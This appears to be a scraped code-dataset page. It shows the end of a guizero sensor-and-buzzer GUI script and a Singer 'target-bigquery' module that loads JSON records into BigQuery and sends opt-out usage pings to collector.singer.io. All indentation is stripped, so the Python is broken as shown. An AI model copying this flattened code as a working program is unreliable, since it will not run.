temp_c_field.value = str(temp)
eco2_field.value = str(e_co2)
t1 = threading.Thread(target=update_readings)
def slider_changed(slider_value):
send(str(slider_value))
def buzzer_on():
send("b")
def buzzer_off():
send("q")
log("Start")
Text(app, text="Temp (C)", grid=[0,0], )
temp_c_field = Text(app, text="-", grid=[1,0])
Text(app, text="eCO2 (ppm)", grid=[0,1])
eco2_field = Text(app, text="-", grid=[1,1])
checkbox = CheckBox(app, text="LEDs Manual", command=checkbox_changed, grid=[0,2])
Text(app, text="LED Level", grid=[0,3])
slider = Slider(app, start=0, end=6, command=slider_changed, grid=[1,3])
PushButton(app, text="Buzzer on", command=buzzer_on, grid=[0,4])
PushButton(app, text="Buzzer off", command=buzzer_off, grid=[1,4])
t1.start()
app.display()
|
target_bigquery.py
|
#!/usr/bin/env python3
import argparse
import collections
import http.client
import io
import json
import logging
import sys
import threading
import urllib
from tempfile import TemporaryFile
from typing import List
import pkg_resources
import singer
from google.api_core import exceptions
from google.cloud import bigquery
from google.cloud.bigquery import Dataset, WriteDisposition
from google.cloud.bigquery import LoadJobConfig
from google.cloud.bigquery import SchemaField
from google.cloud.bigquery.job import SourceFormat
from jsonschema import validate
from oauth2client import tools
try:
parser = argparse.ArgumentParser(parents=[tools.argparser])
parser.add_argument('-c', '--config', help='Config file', required=True)
flags = parser.parse_args()
except ImportError:
flags = None
logging.getLogger('googleapiclient.discovery_cache').setLevel(logging.ERROR)
logger = singer.get_logger()
SCOPES = ['https://www.googleapis.com/auth/bigquery', 'https://www.googleapis.com/auth/bigquery.insertdata']
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Singer BigQuery Target'
StreamMeta = collections.namedtuple('StreamMeta', ['schema', 'key_properties', 'bookmark_properties'])
def emit_state(state):
if state is not None:
line = json.dumps(state)
logger.debug('Emitting state {}'.format(line))
sys.stdout.write("{}\n".format(line))
sys.stdout.flush()
def clear_dict_hook(items):
return {k: v if v is not None else '' for k, v in items}
def bq_field_sanitize(name):
if name[0].isdigit():
raise Exception("Field name can not start with digit: {}".format(name))
return name.replace('-', '_')
def define_schema(field, name):
schema_name = bq_field_sanitize(name)
schema_type = "STRING"
schema_mode = "NULLABLE"
schema_description = None
schema_fields = ()
if 'type' not in field and 'anyOf' in field:
for types in field['anyOf']:
if types['type'] == 'null':
schema_mode = 'NULLABLE'
else:
field = types
if isinstance(field['type'], list):
if field['type'][0] == "null":
schema_mode = 'NULLABLE'
else:
schema_mode = 'required'
schema_type = field['type'][-1]
else:
schema_type = field['type']
if schema_type == "object":
if "properties" not in field.keys():
schema_type = "string"
else:
schema_type = "RECORD"
schema_fields = tuple(build_schema(field))
if not schema_fields:
schema_type = "string"
if schema_type == "array":
items_type = field.get('items').get('type')
schema_type = items_type[-1] if isinstance(items_type, list) else items_type
schema_mode = "REPEATED"
if schema_type == "object":
schema_type = "RECORD"
schema_fields = tuple(build_schema(field.get('items')))
if schema_type == "string":
if "format" in field:
if field['format'] == "date-time":
schema_type = "timestamp"
if schema_type == 'number':
schema_type = 'FLOAT'
return (schema_name, schema_type, schema_mode, schema_description, schema_fields)
def build_schema(schema):
SCHEMA = []
for key in schema['properties'].keys():
if not (bool(schema['properties'][key])):
# if we endup with an empty record.
continue
try:
schema_name, schema_type, schema_mode, schema_description, schema_fields = define_schema(
schema['properties'][key], key)
SCHEMA.append(SchemaField(schema_name, schema_type, schema_mode, schema_description, schema_fields))
except:
pass
return SCHEMA
def persist_lines_job(project_id, dataset_id, lines=None, truncate=False, validate_records=True):
state = None
schemas = {}
key_properties = {}
tables = {}
rows = {}
errors = {}
bigquery_client = bigquery.Client(project=project_id)
# try:
# dataset = bigquery_client.create_dataset(Dataset(dataset_ref)) or Dataset(dataset_ref)
# except exceptions.Conflict:
# pass
for line in lines:
try:
msg = singer.parse_message(line)
except json.decoder.JSONDecodeError:
logger.error("Unable to parse:\n{}".format(line))
raise
if isinstance(msg, singer.RecordMessage):
if msg.stream not in schemas:
raise Exception(
"A record for stream {} was encountered before a corresponding schema".format(msg.stream))
schema = schemas[msg.stream]
if validate_records:
validate(msg.record, schema)
# NEWLINE_DELIMITED_JSON expects literal JSON formatted data, with a newline character splitting each row.
dat = bytes(json.dumps(msg.record) + '\n', 'UTF-8')
rows[msg.stream].write(dat)
# rows[msg.stream].write(bytes(str(msg.record) + '\n', 'UTF-8'))
state = None
elif isinstance(msg, singer.StateMessage):
logger.debug('Setting state to {}'.format(msg.value))
state = msg.value
elif isinstance(msg, singer.SchemaMessage):
table = msg.stream
schemas[table] = msg.schema
key_properties[table] = msg.key_properties
# tables[table] = bigquery.Table(dataset.table(table), schema=build_schema(schemas[table]))
rows[table] = TemporaryFile(mode='w+b')
errors[table] = None
# try:
# tables[table] = bigquery_client.create_table(tables[table])
# except exceptions.Conflict:
# pass
elif isinstance(msg, singer.ActivateVersionMessage):
# This is experimental and won't be used yet
pass
else:
raise Exception("Unrecognized message {}".format(msg))
for table in rows.keys():
table_ref = bigquery_client.dataset(dataset_id).table(table)
SCHEMA = build_schema(schemas[table])
load_config = LoadJobConfig()
load_config.schema = SCHEMA
load_config.source_format = SourceFormat.NEWLINE_DELIMITED_JSON
if truncate:
load_config.write_disposition = WriteDisposition.WRITE_TRUNCATE
rows[table].seek(0)
logger.info("loading {} to Bigquery.\n".format(table))
load_job = bigquery_client.load_table_from_file(
rows[table], table_ref, job_config=load_config)
logger.info("loading job {}".format(load_job.job_id))
logger.info(load_job.result())
# for table in errors.keys():
# if not errors[table]:
# print('Loaded {} row(s) into {}:{}'.format(rows[table], dataset_id, table), tables[table].path)
# else:
# print('Errors:', errors[table], sep=" ")
return state
def apply_string_conversions(record: dict, schema: List[SchemaField], stream):
for schema_field in schema:
# if isinstance(record, list):
rec_field = record.get(schema_field.name)
if rec_field:
if schema_field.field_type == "STRING":
record[schema_field.name] = str(rec_field)
elif schema_field.field_type in ["RECORD", "STRUCT"]:
if schema_field.mode == "REPEATED":
record[schema_field.name] = [apply_string_conversions(rec_item, schema_field.fields, stream + "." + schema_field.name) for rec_item in rec_field]
else:
record[schema_field.name] = apply_string_conversions(rec_field, schema_field.fields, stream + "." + schema_field.name)
return record
def persist_lines_stream(project_id, dataset_id, lines=None, validate_records=True):
state = None
schemas = {}
key_properties = {}
tables = {}
rows = {}
errors = {}
bigquery_client = bigquery.Client(project=project_id)
dataset_ref = bigquery_client.dataset(dataset_id)
dataset = Dataset(dataset_ref)
try:
dataset = bigquery_client.create_dataset(Dataset(dataset_ref)) or Dataset(dataset_ref)
except exceptions.Conflict:
pass
for line in lines:
try:
msg = singer.parse_message(line)
except json.decoder.JSONDecodeError:
logger.error("Unable to parse:\n{}".format(line))
raise
if isinstance(msg, singer.RecordMessage):
if msg.stream not in schemas:
raise Exception(
"A record for stream {} was encountered before a corresponding schema".format(msg.stream))
schema = schemas[msg.stream]
if validate_records:
validate(msg.record, schema)
msg.record = apply_string_conversions(msg.record, tables[msg.stream].schema, msg.stream)
errors[msg.stream] = bigquery_client.insert_rows_json(tables[msg.stream], [msg.record],
ignore_unknown_values=True)
rows[msg.stream] += 1
state = None
elif isinstance(msg, singer.StateMessage):
logger.debug('Setting state to {}'.format(msg.value))
state = msg.value
elif isinstance(msg, singer.SchemaMessage):
table = msg.stream
schemas[table] = msg.schema
key_properties[table] = msg.key_properties
tables[table] = bigquery.Table(dataset.table(table), schema=build_schema(schemas[table]))
rows[table] = 0
errors[table] = None
try:
tables[table] = bigquery_client.create_table(tables[table])
except exceptions.Conflict:
pass
elif isinstance(msg, singer.ActivateVersionMessage):
# This is experimental and won't be used yet
pass
else:
raise Exception("Unrecognized message {}".format(msg))
for table in errors.keys():
if not errors[table]:
logging.info('Loaded {} row(s) into {}:{}'.format(rows[table], dataset_id, table, tables[table].path))
emit_state(state)
else:
logging.error('Errors:', errors[table])
return state
def collect():
try:
version = pkg_resources.get_distribution('target-bigquery').version
conn = http.client.HTTPConnection('collector.singer.io', timeout=10)
conn.connect()
params = {
'e': 'se',
'aid': 'singer',
'se_ca': 'target-bigquery',
'se_ac': 'open',
'se_la': version,
}
conn.request('GET', '/i?' + urllib.parse.urlencode(params))
conn.getresponse()
conn.close()
except:
logger.debug('Collection request failed')
def main():
with open(flags.config) as input:
config = json.load(input)
if not config.get('disable_collection', False):
logger.info('Sending version information to stitchdata.com. ' +
'To disable sending anonymous usage data, set ' +
'the config parameter "disable_collection" to true')
threading.Thread(target=collect).start()
if config.get('replication_method') == 'FULL_TABLE':
truncate = True
else:
truncate = False
validate_records = config.get('validate_records', True)
input = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')
if config.get('stream_data', True):
state = persist_lines_stream(config['project_id'], config['dataset_id'], input,
validate_records=validate_records)
else:
state = persist_lines_job(config['project_id'], config['dataset_id'], input, truncate=truncate,
validate_records=validate_records)
emit_state(state)
logger.debug("Exiting normally")
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.